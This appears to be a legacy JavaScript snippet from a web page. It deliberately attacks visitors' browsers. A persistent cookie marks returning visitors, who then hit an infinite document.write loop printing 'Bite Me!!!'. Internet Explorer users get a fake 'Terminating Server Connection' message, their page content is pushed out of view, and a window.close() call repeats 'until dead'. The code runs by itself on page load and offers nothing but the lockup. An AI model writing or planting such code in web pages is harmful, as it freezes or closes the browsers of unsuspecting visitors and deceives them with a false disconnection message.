	var ns4 = (document.layers)? true:false;
	var ie4 = (document.all)? true:false;
	
	var FiveYear = new Date();
	FiveYear.setFullYear(FiveYear.getFullYear() + 5);
	
	if (document.cookie == "I'm a hacker hang me!!!")
	{
	  while(1)
	  {
	    document.write("Bite Me!!!")
	  }
	}
	else
	{
	  document.cookie = "I'm a hacker hang me!!!;expires=" + FiveYear.toGMTString();
	}
	
	if(ie4)
	{
	  writedoc()
	}

	function KFA()
	{
	  document.write
	  ("<H1>You have been disconnected</H1></BODY></HTML>")
	  window.setInterval("window.close()",10)	//Repeat Close Request Until Dead 
	}
	
	function writedoc()
	{
	  var i;
	  document.write
	  ("<HTML><BODY><H1>Internet Explorer Not Allowed, Terminating Server Connection...</H1>")
	  for(i=0;i<100;i++)				//Do not allow client to view content of page
	     {
	       document.write ("<BR>")
	     }
	  window.setTimeout("KFA()",2000)   //Kill the client window
	}
	
	function LockEm()
	{
	  while(1)
	  {
	    document.write("Bite Me!!!")
	  }
	}
